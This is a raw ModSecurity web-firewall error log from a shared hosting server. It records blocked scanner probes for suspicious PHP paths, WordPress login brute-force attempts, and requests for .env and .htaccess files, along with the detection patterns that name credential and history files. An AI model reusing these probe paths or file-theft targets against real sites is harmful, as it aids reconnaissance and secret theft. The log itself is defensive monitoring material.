[Tue May 26 19:20:01.456280 2026] [security2:error] [pid 37506:tid 37723] [client 20.226.249.33:2347] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.249.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.marriage4hindu.com.md-74.webhostbox.net"] [uri "/wp-includes/Text/index.php"] [unique_id "ahWlCQKctTPx5f8aOzkQKgAAAFc"]
[Tue May 26 19:20:01.456401 2026] [security2:error] [pid 37506:tid 37723] [client 20.226.249.33:2347] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.marriage4hindu.com.md-74.webhostbox.net"] [uri "/wp-includes/Text/index.php"] [unique_id "ahWlCQKctTPx5f8aOzkQKgAAAFc"]
[Tue May 26 19:20:02.602397 2026] [security2:error] [pid 37506:tid 37738] [client 20.226.249.33:51488] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.249.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.marriage4hindu.com.md-74.webhostbox.net"] [uri "/a7.php"] [unique_id "ahWlCgKctTPx5f8aOzkQbQAAAGY"]
[Tue May 26 19:20:02.602509 2026] [security2:error] [pid 37506:tid 37738] [client 20.226.249.33:51488] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.marriage4hindu.com.md-74.webhostbox.net"] [uri "/a7.php"] [unique_id "ahWlCgKctTPx5f8aOzkQbQAAAGY"]
[Tue May 26 19:20:02.751201 2026] [security2:error] [pid 37506:tid 37718] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWlCgKctTPx5f8aOzkQWQAAAFI"]
[Tue May 26 19:20:03.177481 2026] [security2:error] [pid 37506:tid 37723] [client 66.249.66.14:53236] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "blettclms.com"] [uri "/index.php/robots.txt"] [unique_id "ahWlCgKctTPx5f8aOzkQbgAAAFc"]
[Tue May 26 19:20:03.391730 2026] [security2:error] [pid 37506:tid 37735] [client 114.119.151.107:49637] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.gcirsm.org.in"] [uri "/robots.txt"] [unique_id "ahWlCwKctTPx5f8aOzkQlQAAAGM"]
[Tue May 26 19:20:03.454205 2026] [security2:error] [pid 37506:tid 37642] [client 20.226.249.33:2734] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.249.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.marriage4hindu.com.md-74.webhostbox.net"] [uri "/x.php"] [unique_id "ahWlCwKctTPx5f8aOzkQmQAAAAY"]
[Tue May 26 19:20:03.454292 2026] [security2:error] [pid 37506:tid 37642] [client 20.226.249.33:2734] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.marriage4hindu.com.md-74.webhostbox.net"] [uri "/x.php"] [unique_id "ahWlCwKctTPx5f8aOzkQmQAAAAY"]
[Tue May 26 19:20:04.123296 2026] [security2:error] [pid 37506:tid 37628] [remote 216.73.216.30:40492] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWlDAKctTPx5f8aOzkQvwAAOHk"]
[Tue May 26 19:20:04.384123 2026] [security2:error] [pid 37506:tid 37643] [client 20.226.249.33:2749] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.249.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.marriage4hindu.com.md-74.webhostbox.net"] [uri "/wp-admin/js/admin.php"] [unique_id "ahWlDAKctTPx5f8aOzkQyQAAAAc"]
[Tue May 26 19:20:04.384290 2026] [security2:error] [pid 37506:tid 37643] [client 20.226.249.33:2749] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.marriage4hindu.com.md-74.webhostbox.net"] [uri "/wp-admin/js/admin.php"] [unique_id "ahWlDAKctTPx5f8aOzkQyQAAAAc"]
[Tue May 26 19:20:05.084944 2026] [security2:error] [pid 37506:tid 37640] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWlDAKctTPx5f8aOzkQ3wAAAAQ"]
[Tue May 26 19:20:05.860158 2026] [security2:error] [pid 37506:tid 37705] [client 20.226.249.33:16856] ModSecurity: Warning. Pattern match "/1\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1543"] [id "900921"] [msg "temporary TUW-72162 logging rule"] [hostname "mail.marriage4hindu.com.md-74.webhostbox.net"] [uri "/1.php"] [unique_id "ahWlDQKctTPx5f8aOzkRJQAAAEU"]
[Tue May 26 19:20:05.860247 2026] [security2:error] [pid 37506:tid 37705] [client 20.226.249.33:16856] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.249.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.marriage4hindu.com.md-74.webhostbox.net"] [uri "/1.php"] [unique_id "ahWlDQKctTPx5f8aOzkRJQAAAEU"]
[Tue May 26 19:20:05.860331 2026] [security2:error] [pid 37506:tid 37705] [client 20.226.249.33:16856] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.marriage4hindu.com.md-74.webhostbox.net"] [uri "/1.php"] [unique_id "ahWlDQKctTPx5f8aOzkRJQAAAEU"]
[Tue May 26 19:20:06.678879 2026] [security2:error] [pid 37506:tid 37552] [remote 194.163.139.224:35316] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 224.139.163.194.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "poonawallatennisacademy.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWlDgKctTPx5f8aOzkRRwAAQy0"]
[Tue May 26 19:20:07.075465 2026] [security2:error] [pid 37506:tid 37573] [remote 194.163.139.224:35316] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 224.139.163.194.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "poonawallatennisacademy.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWlDwKctTPx5f8aOzkRYgAAZkI"], referer: https://poonawallatennisacademy.moes-art.com/wp-login.php
[Tue May 26 19:20:07.274139 2026] [security2:error] [pid 37506:tid 37658] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWlDgKctTPx5f8aOzkRWgAAABY"]
[Tue May 26 19:20:09.766415 2026] [security2:error] [pid 37506:tid 37722] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWlEQKctTPx5f8aOzkR4AAAAFY"]
[Tue May 26 19:20:10.454420 2026] [security2:error] [pid 37506:tid 37599] [remote 199.247.4.24:42572] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 24.4.247.199.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWlEgKctTPx5f8aOzkSGgAAIlw"]
[Tue May 26 19:20:11.868707 2026] [security2:error] [pid 37506:tid 37763] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWlEwKctTPx5f8aOzkSXQAAAH8"]
[Tue May 26 19:20:12.329208 2026] [security2:error] [pid 37506:tid 37619] [remote 185.75.143.243:19367] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 243.143.75.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWlEwKctTPx5f8aOzkSeAAAYHA"]
[Tue May 26 19:20:12.764283 2026] [security2:error] [pid 37506:tid 37516] [remote 185.75.143.243:19367] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 243.143.75.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWlFAKctTPx5f8aOzkSoAAAJwk"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:20:13.904293 2026] [security2:error] [pid 37506:tid 37704] [client 195.133.24.182:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "triviewsolutions.com"] [uri "/index.php"] [unique_id "ahWlFQKctTPx5f8aOzkSvAAAAEQ"], referer: http://triviewsolutions.com/contact-us.html
[Tue May 26 19:20:14.179740 2026] [security2:error] [pid 37506:tid 37644] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWlFQKctTPx5f8aOzkS2gAAAAg"]
[Tue May 26 19:20:16.333319 2026] [security2:error] [pid 37506:tid 37731] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWlFwKctTPx5f8aOzkTUwAAAF8"]
[Tue May 26 19:20:16.817241 2026] [security2:error] [pid 37506:tid 37563] [remote 202.61.233.177:53964] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 177.233.61.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "friendsalongtheway.net"] [uri "/wp-login.php"] [unique_id "ahWlGAKctTPx5f8aOzkTewAAdjg"]
[Tue May 26 19:20:17.157575 2026] [security2:error] [pid 37506:tid 37561] [remote 202.61.233.177:53964] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 177.233.61.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "friendsalongtheway.net"] [uri "/wp-login.php"] [unique_id "ahWlGQKctTPx5f8aOzkTlQAATTY"], referer: https://friendsalongtheway.net/wp-login.php
[Tue May 26 19:20:18.630395 2026] [security2:error] [pid 37506:tid 37659] [client 176.65.139.237:22106] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "adg-foods.com.thedebateafrica.org"] [uri "/.env"] [unique_id "ahWlGgKctTPx5f8aOzkT4gAAABc"]
[Tue May 26 19:20:18.675184 2026] [security2:error] [pid 37506:tid 37650] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWlGgKctTPx5f8aOzkT0QAAAA4"]
[Tue May 26 19:20:20.350934 2026] [security2:error] [pid 37506:tid 37716] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWlGwKctTPx5f8aOzkUOAAAAFA"]
[Tue May 26 19:20:22.489805 2026] [security2:error] [pid 37506:tid 37511] [remote 74.7.241.58:60632] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahWlHgKctTPx5f8aOzkUtQAAFQQ"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/shop/wp-content/plugins/wp-staging/Framework/DI
[Tue May 26 19:20:23.059156 2026] [security2:error] [pid 37506:tid 37721] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWlHgKctTPx5f8aOzkUwAAAAFU"]
[Tue May 26 19:20:24.762970 2026] [security2:error] [pid 37506:tid 37698] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWlIAKctTPx5f8aOzkVGwAAAD4"]
[Tue May 26 19:20:25.110049 2026] [security2:error] [pid 37506:tid 37718] [client 66.84.91.171:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWlIQKctTPx5f8aOzkVQgAAAFI"], referer: https://www.anujtradingco.com/
[Tue May 26 19:20:26.809082 2026] [security2:error] [pid 37506:tid 37739] [client 66.84.91.171:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWlIgKctTPx5f8aOzkVigAAAGc"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1460809&moderation-hash=73b0cbe0ac89cadd9288c857cd3e5de5
[Tue May 26 19:20:27.305468 2026] [security2:error] [pid 37506:tid 37735] [client 91.169.4.153:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWlIgKctTPx5f8aOzkVkAAAAGM"]
[Tue May 26 19:20:27.351070 2026] [security2:error] [pid 37506:tid 37560] [remote 57.141.2.25:43048] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 25.2.141.57.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahWlIwKctTPx5f8aOzkVqwAAADU"]
[Tue May 26 19:20:27.561581 2026] [security2:error] [pid 37506:tid 37655] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWlIwKctTPx5f8aOzkVoQAAABM"]
[Tue May 26 19:20:29.822535 2026] [security2:error] [pid 37506:tid 37672] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWlJQKctTPx5f8aOzkWJQAAACQ"]
[Tue May 26 19:20:29.885358 2026] [security2:error] [pid 37506:tid 37745] [client 89.58.65.236:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWlJQKctTPx5f8aOzkWKQAAAG0"]
[Tue May 26 19:20:31.163057 2026] [security2:error] [pid 37506:tid 37632] [remote 64.188.91.103:55358] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatchFromFile sitelock.txt" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "398"] [id "900247"] [msg "Wordpress Plugin README.txt file access attempt"] [hostname "kurgu-afrika.com"] [uri "/wp-content/plugins/fusion-builder/readme.txt"] [unique_id "ahWlJwKctTPx5f8aOzkWoQAAFn0"]
[Tue May 26 19:20:32.497161 2026] [security2:error] [pid 37506:tid 37683] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWlKAKctTPx5f8aOzkW2wAAAC8"]
[Tue May 26 19:20:32.677853 2026] [security2:error] [pid 37506:tid 37707] [client 34.150.193.178:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahWlJQKctTPx5f8aOzkWHQAAR2A"], referer: http://kingsclub.in/media/system/js/core.js
[Tue May 26 19:20:34.565522 2026] [security2:error] [pid 37506:tid 37698] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWlKgKctTPx5f8aOzkXRAAAAD4"]
[Tue May 26 19:20:35.736789 2026] [security2:error] [pid 37506:tid 37582] [remote 216.73.217.110:17392] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 110.217.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rainadelproperties.com"] [uri "/webhook.php"] [unique_id "ahWlKwKctTPx5f8aOzkXiwAAKUs"]
[Tue May 26 19:20:36.578817 2026] [security2:error] [pid 37506:tid 37643] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWlLAKctTPx5f8aOzkXoQAAAAc"]
[Tue May 26 19:20:37.246971 2026] [security2:error] [pid 37506:tid 37744] [client 185.191.171.17:33748] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/"] [unique_id "ahWlLQKctTPx5f8aOzkX0QAAAGw"]
[Tue May 26 19:20:37.247110 2026] [security2:error] [pid 37506:tid 37744] [client 185.191.171.17:33748] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/"] [unique_id "ahWlLQKctTPx5f8aOzkX0QAAAGw"]
[Tue May 26 19:20:37.482017 2026] [security2:error] [pid 37506:tid 37602] [remote 216.73.216.30:50238] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at ARGS:filesrc. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data ".htaccess"] [severity "CRITICAL"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWlLQKctTPx5f8aOzkX3QAARF8"]
[Tue May 26 19:20:37.933409 2026] [security2:error] [pid 37506:tid 37607] [remote 216.73.216.30:50238] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWlLQKctTPx5f8aOzkX8gAARGQ"]
[Tue May 26 19:20:38.984540 2026] [security2:error] [pid 37506:tid 37669] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWlLgKctTPx5f8aOzkYGwAAACE"]
[Tue May 26 19:20:39.296670 2026] [security2:error] [pid 37506:tid 37622] [remote 216.73.216.30:50238] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at ARGS:filesrc. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data ".htaccess"] [severity "CRITICAL"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWlLwKctTPx5f8aOzkYQgAARHM"]
[Tue May 26 19:20:39.400164 2026] [security2:error] [pid 37506:tid 37625] [remote 143.198.203.76:35326] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.203.198.143.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWlLwKctTPx5f8aOzkYQQAABHY"]
[Tue May 26 19:20:39.864874 2026] [security2:error] [pid 37506:tid 37620] [remote 216.73.216.30:50238] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at ARGS:filesrc. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data ".htaccess"] [severity "CRITICAL"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWlLwKctTPx5f8aOzkYYAAARHE"]
[Tue May 26 19:20:40.205897 2026] [security2:error] [pid 37506:tid 37517] [remote 216.73.216.30:50238] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWlMAKctTPx5f8aOzkYcQAARAo"]
[Tue May 26 19:20:40.559159 2026] [security2:error] [pid 37506:tid 37627] [remote 216.73.216.30:50238] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWlMAKctTPx5f8aOzkYgAAARHg"]
[Tue May 26 19:20:40.769365 2026] [security2:error] [pid 37506:tid 37649] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWlMAKctTPx5f8aOzkYfAAAAA0"]
[Tue May 26 19:20:41.793273 2026] [security2:error] [pid 37506:tid 37630] [remote 216.73.216.30:50238] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWlMQKctTPx5f8aOzkYvAAARHs"]
